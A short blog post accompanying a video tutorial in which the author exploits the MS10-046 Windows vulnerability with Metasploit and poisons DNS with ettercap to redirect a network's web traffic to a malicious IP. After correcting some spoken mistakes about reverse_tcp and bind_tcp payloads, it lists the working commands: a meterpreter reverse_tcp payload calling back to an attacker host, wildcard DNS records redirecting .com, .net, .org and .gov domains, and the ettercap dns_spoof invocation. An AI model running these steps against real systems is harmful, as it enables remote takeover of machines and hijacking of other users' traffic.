Ok, so this is my first attempt at a video tutorial of me performing the MS10-046 exploit in the Metasploit framework, then using ettercap to poison DNS on my network so that I can redirect all http traffic to a malicious IP.I got nervous and messed up a few explanations, so I’m going to explain them here after you view the embedded Youtube video in all it’s glory! (PS Watch it in 720p, you can’t quite see the commands otherwise)
Ok, so, a few things:
reverse_tcp does not open a listening “server” or socket on the victim box, it will actually create the open listening socket on your attacker machine and direct the victim box to your LHOST setting. I misspoke, like I said I was nervous, first video, etc. bind_tcp will open a listening socket on your victim machine and you can connect to it.
The reason we want to use a reverse_tcp payload when our victim PC has Windows Firewall or any firewall on it is because firewalls normally won’t just let any old traffic in, but will let most traffic out. Using bind_tcp, the victim box acts as a server and our attacking box acts as client, this is where we see the problem. Using reverse_tcp, our attacking box acts as the server and the victim acts as the client.
“hackme-some random numbers, this must be the UID” No, it is not the UID, they are just some random numbers I assigned the VM when I made it. I don’t know why I said this.
Now we’re past that, here are the main commands I used:
set SRVHOST ATTACKER_IP_ADDR
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST ATTACKER_IP_ADDR
*.com A 192.168.217.133
*.net A 192.168.217.133
*.org A 192.168.217.133
*.gov A 192.168.217.133
ettercap -T -q -i eth0 -P dns_spoof // //
MSF post exploitation:
sessions -i 1
I enjoyed making this video, so maybe you might see some more. If you have any questions feel free to comment on this or email me: email@example.com
Direct video link: http://disillusion.us/videos/MS10-046.mp4